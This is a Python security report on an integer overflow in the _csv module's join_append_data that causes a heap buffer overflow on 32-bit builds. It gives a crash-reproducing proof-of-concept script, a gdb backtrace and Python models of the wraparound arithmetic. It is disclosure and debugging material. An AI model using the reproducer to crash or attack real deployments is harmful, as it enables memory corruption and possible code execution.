Issue 27758: integer overflow in the _csv module's join_append_data function
Thomas E Hybel on PSRT reports:
This vulnerability is an integer overflow leading to a heap buffer overflow. I have attached a proof-of-concept script below.
The vulnerability resides in the Modules/_csv.c file, in the join_append and join_append_data functions.
join_append initially calls join_append_data with copy_phase=0 to compute the new length of its internal "rec" buffer. Then it grows the buffer. Finally it calls join_append_data with copy_phase=1 to perform the actual writing.
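The count-then-copy pattern described above can be sketched in Python. This is a simplified model, not the actual C code: the names append_data and append, the list-based buffer, and the hard-coded delimiter and quote character are all assumptions made for illustration. Python integers do not overflow, so the model shows only the two-phase structure, not the bug.

```python
# Simplified model of the count-then-copy pattern; not the real _csv.c code.
DELIMITER = ","
QUOTECHAR = '"'

def append_data(rec, rec_len, num_fields, field, quoted, copy_phase):
    """Return the new record length; write into rec only when copy_phase is true."""
    def addch(c):
        nonlocal rec_len
        if copy_phase:
            rec[rec_len] = c
        rec_len += 1

    if num_fields > 0:
        addch(DELIMITER)          # separator before every field but the first
    if quoted:
        addch(QUOTECHAR)          # opening quote
    for c in field:
        if c == QUOTECHAR:
            addch(QUOTECHAR)      # embedded quotes are doubled
        addch(c)
    if quoted:
        addch(QUOTECHAR)          # closing quote
    return rec_len

def append(rec, rec_len, num_fields, field):
    """Phase 1 counts, then the buffer grows, then phase 2 copies."""
    quoted = QUOTECHAR in field or DELIMITER in field
    new_len = append_data(rec, rec_len, num_fields, field, quoted, copy_phase=False)
    if new_len > len(rec):
        rec.extend([None] * (new_len - len(rec)))
    return append_data(rec, rec_len, num_fields, field, quoted, copy_phase=True)

rec = []
n = append(rec, 0, 0, "ab")
n = append(rec, n, 1, 'c"d')
print("".join(rec[:n]))  # ab,"c""d"
```

The copy phase trusts the length computed by the counting phase, so any error in the count turns directly into an out-of-bounds write.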
The root issue is that join_append_data does not check for overflow when computing the rec_len value that it returns. By calling join_append_data on a few fields of appropriate length, we can make rec_len wrap around and become a small positive integer.
Note that join_append already checks whether (rec_len < 0). But this check is insufficient: a single call can grow rec_len far enough that it wraps past the entire negative range and ends up positive again, so join_append never sees a negative size.
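The arithmetic can be checked with a short Python model of 32-bit signed wraparound. The helper names to_int32 and quoted_field_cost are hypothetical, and the cost formula assumes the default dialect, where each embedded quote character is doubled and the field is wrapped in two enclosing quotes. Signed overflow is formally undefined in C; the model assumes the usual two's-complement wrap.

```python
def to_int32(n):
    """Wrap an unbounded Python int to a signed 32-bit value (two's complement)."""
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n >= 0x80000000 else n

def quoted_field_cost(n_quotes, has_delimiter):
    """Bytes counted for a field made only of quote characters."""
    # optional delimiter + doubled quote characters + 2 enclosing quotes
    return (1 if has_delimiter else 0) + 2 * n_quotes + 2

FIRST_LEN = 0x10000      # "A" * 0x10000, needs no quoting
QUOTE_LEN = 0x7fffff00   # '"' * 0x7fffff00

# The quote field alone wraps to a negative value, which (rec_len < 0) catches.
alone = to_int32(0 + quoted_field_cost(QUOTE_LEN, has_delimiter=False))

# Preceded by the "A" field, the sum wraps past the negative range entirely.
after_first = to_int32(FIRST_LEN + quoted_field_cost(QUOTE_LEN, has_delimiter=True))

print(alone)             # -510
print(hex(after_first))  # 0xfe03
```

This is why the proof of concept writes a harmless 0x10000-byte field first: it supplies just enough extra length to push the wrapped total back above zero.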
After the overflow happens, rec_len is a small integer, and thus when join_append calls join_check_rec_size to potentially grow the rec buffer, no enlargement happens. After this, join_append_data is called again, now with copy_phase=1, and with a giant field_len.
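A rough sketch of why the buffer is not enlarged, using the field lengths from the proof of concept. The growth test rec_len > rec_size and the name needs_growth are assumptions of this model, and assumed_rec_size is only a lower bound (the buffer must already hold the first 0x10000-byte field); the real allocation may be somewhat larger.

```python
INT32_MODULUS = 2 ** 32

rec_len_before = 0x10000                 # record length after the first field
field_cost = 1 + 2 * 0x7fffff00 + 2      # delimiter + doubled quotes + enclosing quotes

# The result is below 2**31, so unsigned and signed wrapping agree here.
wrapped_rec_len = (rec_len_before + field_cost) % INT32_MODULUS

def needs_growth(rec_len, rec_size):
    """Assumed model of the size check: grow only if the record no longer fits."""
    return rec_len > rec_size

assumed_rec_size = 0x10000               # lower bound on the current buffer size

print(hex(wrapped_rec_len))                              # 0xfe03
print(needs_growth(wrapped_rec_len, assumed_rec_size))   # False

# The copy phase still starts at rec_len_before and writes field_cost bytes.
overrun = rec_len_before + field_cost - assumed_rec_size
print(overrun)                                           # 4294966787
```

Under these assumptions the copy phase tries to write roughly 4 GiB past a buffer that was sized for the wrapped length.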
Thus join_append_data writes the remaining data past the end of the self->rec buffer, which is located on the heap. Heap corruption this extensive is likely exploitable, potentially for remote code execution.
Further details:
Tested version: Python-3.5.2, 32 bits
Proof-of-concept reproducer script (32-bits only):
--- begin script ---
import _csv

class MockFile:
    def write(self, _): pass

writer = _csv.writer(MockFile())
writer.writerow(["A"*0x10000, '"'*0x7fffff00])
--- end script ---
Python (configured with --with-pydebug) segfaults when the script is run. A backtrace can be seen below. Note that the script only crashes on 32-bit versions of Python. That's because the rec_len variable is a Py_ssize_t, which is 4 bytes wide on 32-bit architectures but 8 bytes wide on 64-bit architectures.
(gdb) r
Starting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc1.py
...
Program received signal SIGSEGV, Segmentation fault.
PyType_IsSubtype (a=0x0, b=b@entry=0x82d9aa0 ) at Objects/typeobject.c:1343
1343 mro = a->tp_mro;
(gdb) bt
#0 PyType_IsSubtype (a=0x0, b=b@entry=0x82d9aa0 ) at Objects/typeobject.c:1343
#1 0x080e29d9 in PyModule_GetState (m=0xb7c377f4) at Objects/moduleobject.c:532
#2 0xb7fd1a33 in join_append_data (self=self@entry=0xb7c2ffac, field_kind=field_kind@entry=0x1,
   field_data=field_data@entry=0x37c2f038, field_len=field_len@entry=0x7fffff00,
   quoted=quoted@entry=0xbffff710, copy_phase=copy_phase@entry=0x1)
   at /home/ubuntu32/python3/Python-3.5.2/Modules/_csv.c:1060
#3 0xb7fd1d6e in join_append (self=self@entry=0xb7c2ffac, field=field@entry=0x37c2f018,
   quoted=0x1, quoted@entry=0x0)
   at /home/ubuntu32/python3/Python-3.5.2/Modules/_csv.c:1138
...
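To see why only 32-bit builds are affected, the following sketch checks the width of the interpreter's ssize_t and whether the proof-of-concept lengths exceed the largest representable value. The function names ssize_t_bits and poc_overflows are hypothetical; struct.calcsize("n") and sys.maxsize are standard library facilities.

```python
import struct
import sys

def ssize_t_bits():
    """Width in bits of the native ssize_t used by this interpreter."""
    return struct.calcsize("n") * 8

def poc_overflows(first_len=0x10000, quote_len=0x7fffff00, max_ssize=sys.maxsize):
    """True if the record length for the two PoC fields exceeds max_ssize."""
    # first field + delimiter + doubled quotes + 2 enclosing quotes
    total = first_len + 1 + 2 * quote_len + 2
    return total > max_ssize

print(ssize_t_bits())                       # 32 or 64, depending on the build
print(poc_overflows(max_ssize=2**31 - 1))   # True: wraps on a 32-bit build
print(poc_overflows(max_ssize=2**63 - 1))   # False: fits on a 64-bit build
```

On a 64-bit build the total of about 4 GiB is an ordinary positive length, so the counting phase returns a correct value and no wraparound occurs with these particular field sizes.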